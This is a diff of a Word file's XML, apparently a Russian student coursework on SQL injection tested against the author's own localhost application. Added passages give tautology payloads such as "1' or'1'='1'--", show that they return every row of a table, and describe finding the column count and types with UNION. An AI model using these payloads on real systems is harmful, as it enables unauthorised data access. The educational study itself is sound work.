--- a/CourseWork/sql.docx
+++ b/CourseWork/sql.docx
@@ -5144,7 +5144,6 @@
           <w:b/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -5782,6 +5781,60 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>PriceID</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = 5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>%)'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> or '1' = '1'--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6278,6 +6331,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>PriceID</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -6323,7 +6377,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>PriceID</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -6766,17 +6819,6 @@
         </w:rPr>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8087,7 +8129,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -8304,23 +8345,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> результат выполнения запроса не</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>отображается польз</w:t>
+        <w:t xml:space="preserve"> результат выполнения запроса не отображается польз</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9131,7 +9156,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -9171,7 +9195,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -9395,7 +9418,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -9433,7 +9455,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -9531,7 +9552,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -9561,7 +9581,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -10168,13 +10187,15 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -10189,7 +10210,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -10244,7 +10264,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -10612,7 +10631,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -10642,7 +10660,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -10930,6 +10947,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -11318,7 +11336,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -11340,7 +11357,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -12238,6 +12254,2771 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Применение внедрения </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>-кода на собственном приложении</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Для начала проверяем на подверженность </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>-ин</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ъ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">екциям. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Запрос "</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>1' or'1'='1'--"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> возвращает все записи из текущей таблицы если искать точно по слову</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>. Е</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>сли поиск ведётся по частичному совпадения</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> то срабатывает запрос "</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">". </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Таким образом мы получили все данные из текущей таблицы.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rStyle w:val="a"/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:snapToGrid w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:w w:val="0"/>
+          <w:sz w:val="0"/>
+          <w:szCs w:val="0"/>
+          <w:u w:color="000000"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="000000"/>
+          <w:shd w:val="clear" w:color="000000" w:fill="000000"/>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="2779810" cy="3039854"/>
+            <wp:effectExtent l="19050" t="0" r="1490" b="0"/>
+            <wp:docPr id="1" name="Рисунок 1" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx - Google Chrome.jpg"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 1" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx - Google Chrome.jpg"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7" cstate="print"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2786261" cy="3046909"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="a"/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:snapToGrid w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:w w:val="0"/>
+          <w:sz w:val="0"/>
+          <w:szCs w:val="0"/>
+          <w:u w:color="000000"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="000000"/>
+          <w:shd w:val="clear" w:color="000000" w:fill="000000"/>
+          <w:lang/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="2899078" cy="3161894"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="2" name="Рисунок 2" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx2 - Google Chrome.jpg"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 2" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx2 - Google Chrome.jpg"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8" cstate="print"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2902578" cy="3165711"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Далее определяем количество </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>аргументов</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> и их тип данных.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Для этого воспользуемся простым </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>union</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> оператором. Перебором мы определили, что их количество равно 4 и типы данных в sql-запросе соответственно </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>varchar</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>varchar</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>datetime</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
